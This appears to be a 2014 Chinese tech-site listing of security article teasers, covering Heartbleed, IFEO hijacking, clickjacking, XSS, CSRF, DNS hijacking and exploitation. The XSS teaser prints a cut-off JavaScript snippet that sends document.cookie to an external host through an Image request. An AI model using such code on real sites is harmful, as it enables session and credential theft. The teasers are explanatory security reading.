??随着互联网应用的快速发展,信息安全已深入到诸多领域,前段时间发生的“Struts 2”漏洞及“心脏出血”漏洞影响了二亿中国网民的信息安全,原因是程序员缺少仔细的安全检查导致的。作为程序员,此时我们应该更加关注程序的安全性才对,但现实情况是程序员关注的依然是程序功能的实现,仍然忽视了程序的安全性,以至于很多程序都存在安全漏洞。下面是传智播客C/C++学院仅仅学习了5个月C/C++语言的学生发现的...
分类:
其他好文 时间:
2014-06-20 11:09:27
阅读次数:
262
Image File Execution
Options就是映像劫持技术,通过此种方式替换记事本,非常地绿色环保。Image File Execution
Options是CreateProcess函数中的一个功能,即在可执行程序运行时,Windows会先检测对应IFEO中的Debugger值,如果...
分类:
其他好文 时间:
2014-06-11 23:22:20
阅读次数:
594
Whatis it and why should I care?
X-Frame-Options(在草拟的标准中已经移除X-,只保留Frame-Options)是一个新技术用来指定网站页面是否允许嵌入IFrame页面。这样能够解决点击劫持(clickjacking)攻击。
此技术是基于每个页面的HTTP响应头特定参数实现的。支持(X-)Frame-Options头参数的浏览器根据标准会允许或禁...
分类:
编程语言 时间:
2014-06-11 06:20:49
阅读次数:
362
本文讲述了PHP网站的相关攻击手段,其中包括SQL注入、会话劫持、XSS等攻击手段。本文除了解释各种攻击手段,还提供了各种攻击手段的相关在线资源,供大家参考学习。
分类:
Web程序 时间:
2014-06-09 19:23:12
阅读次数:
261
0×00
背景最近世界真是越来越不太平了,尤其是对于大部分普通人而言。昨天又传来噩耗,根据网络监测公司BGPMon,Google的公开DNS服务器 IP
8.8.8.8被劫持到了委内瑞拉和巴西超过22分钟。Google DNS 服务器平均每天处理超过1500亿个查询,在被劫持的22分钟里起码几百万个...
分类:
其他好文 时间:
2014-06-09 16:06:38
阅读次数:
333
最近在网上看到了一篇利用LD_PRELOAD实现函数拦截的文章,感觉受益匪浅(I'm new),就翻译了出来。里面除了介绍基础的使用方法外,还介绍了相关的使坏技术。...
分类:
系统相关 时间:
2014-05-31 22:29:21
阅读次数:
1172
Off by One根据 Halvar Flake 在“Third Generation
Exploitation”中的描述,漏洞利用技术依攻击难度从小到大分为三类:1. 基础的栈溢出利用,可以利用返回地址轻松劫持进程,植入 shellcode,如对
strcpy、strcat 等函数的攻击。2. ...
分类:
编程语言 时间:
2014-05-30 22:16:39
阅读次数:
399
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
【域名劫持】
在做长连接时,使用域名的方式连接服务器。但有些情况下,使用的域名被运营商等劫持&篡改了。导致不能使用。 【解决方案】
当感知到域名出现问题后,可以尝试从另一个安全的渠道上去获得一个确切的IP地址。 然后尝试去连接。 【使用域名的好处】
用域名来代替IP地址来进行连接,可以带来OP的收益...
分类:
其他好文 时间:
2014-05-19 08:11:30
阅读次数:
315
0x01 什么是CSRF攻击 CSRF是Cross Site Request
Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。
网站是通过cookie...
分类:
其他好文 时间:
2014-05-15 21:20:25
阅读次数:
244